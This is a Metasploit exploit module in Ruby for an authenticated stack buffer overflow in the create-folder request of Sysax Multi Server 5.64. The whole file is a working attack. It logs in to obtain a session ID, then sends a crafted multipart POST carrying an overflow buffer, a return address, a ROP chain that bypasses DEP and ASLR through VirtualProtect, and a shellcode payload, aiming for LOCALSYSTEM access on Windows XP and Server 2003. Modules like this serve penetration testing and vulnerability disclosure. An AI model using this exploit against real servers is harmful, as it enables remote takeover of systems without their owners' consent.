require 'msf/core' require 'base64' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Sysax Multi Server 5.64 Create Folder BoF', 'Description' => %q{ This module exploits a stack buffer overflow in the create folder function in Sysax Multi Server 5.64. This issue was fixed in 5.66. You must have valid credentials to trigger the vulnerability. Your credentials must also have the create folder permission and the HTTP option has to be enabled. This module will log into the server, get your a SID token and then proceed to exploit the server. Successful exploits result in LOCALSYSTEM access. This exploit works on XP SP3, and Server 2003 SP1-SP2. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt Andreko @mandreko', # discovery & Metasploit module for 5.64 'Craig Freyman @cd1zz', # original discovery & Metasploit module for 5.50 ], 'Version' => '$Revision:$', 'References' => [ [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], # 5.64 update [ 'URL', 'http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html' ], # 5.50 post ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x2F", }, 'Targets' => [ [ 'Windows XP SP3', { 'Rop' => false, 'Ret' => 0x77c35459, # push esp # ret [sysaxd.exe] 'Offset' => 701, } ], [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass', { 'Rop' => true, 'Ret' => 0x77baf605, # pivot 'Offset' => 701, 'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] } ], ], 'Privileged' => false, 'DisclosureDate'=> 'July 29, 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('URI', [false, "URI for Multi Server", '/']), Opt::RPORT(80), OptString.new('SysaxUSER', [ true, "Username" ]), OptString.new('SysaxPASS', [ true, "Password" ]) ], self.class) end def target_url "http://#{rhost}:#{rport}#{datastore['URI']}" end def create_rop_chain() rop_gadgets = [] # All rop gadgets generated by mona.py # Thanks corelanc0d3r for making such a great tool if (target == targets[1]) # Windows 2003 rop_gadgets = [ 0x77be3adb, # POP EAX # RETN [msvcrt.dll] 0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll] 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll] 0x41414141, # Filler (compensate) 0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll] 0x77bdb896, # POP EBP # RETN [msvcrt.dll] 0x77be2265, # & push esp # ret [msvcrt.dll] 0x77bdeebf, # POP EAX # RETN [msvcrt.dll] 0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx) 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll] 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx) 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll] 0x77bcc2ee, # POP ECX # RETN [msvcrt.dll] 0x77befbb4, # &Writable location [msvcrt.dll] 0x77bbf75e, # POP EDI # RETN [msvcrt.dll] 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] 0x90909090, # nop 0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll] ].flatten.pack("V*") end return rop_gadgets end def exploit user = datastore['SysaxUSER'] pass = datastore['SysaxPASS'] #base64 encode the credentials encodedcreds = Base64.encode64(user+"\x0a"+pass) creds = "fd="+encodedcreds connect # Login to get SID value print_status "Getting SID from #{target_url}" res = send_request_raw({ 'method'=> 'POST', 'uri' => "#{target_url}/scgi?sid=0&pid=dologin", 'data' => creds },20) #parse response for SID token sid = res.body.match (/(sid=[A-Z0-9a-z]{40})/) print_status "Your " + sid.to_s buffer = rand_text(target['Offset']) buffer << [target.ret].pack('V') if (target['Rop']) buffer << [target['Nop']].pack('V')*16 buffer << create_rop_chain() end buffer << make_nops(15) buffer << payload.encoded #max 1299 bytes #pwnag3 post data post_data = "scgi?"+sid.to_s+"&pid=mk_folder2_name1.htm HTTP/1.1\r\n" post_data << "Content-Length: 171\r\n\r\n" post_data << "-----------------------------1190753071675116720811342231\r\n" post_data << "Content-Disposition: form-data; name=\"e2\"\r\n\r\n" post_data << buffer+"\r\n" post_data << "-----------------------------1190753071675116720811342231--\r\n\r\n" referer = "http://"+datastore['RHOST'].to_s+"/scgi?"+sid.to_s+"&pid=mk_folder1_name1.htm" send_request_raw({ 'uri' => "/" + post_data, 'version' => '1.1', 'method' => 'POST', 'referer' => referer }) handler disconnect end end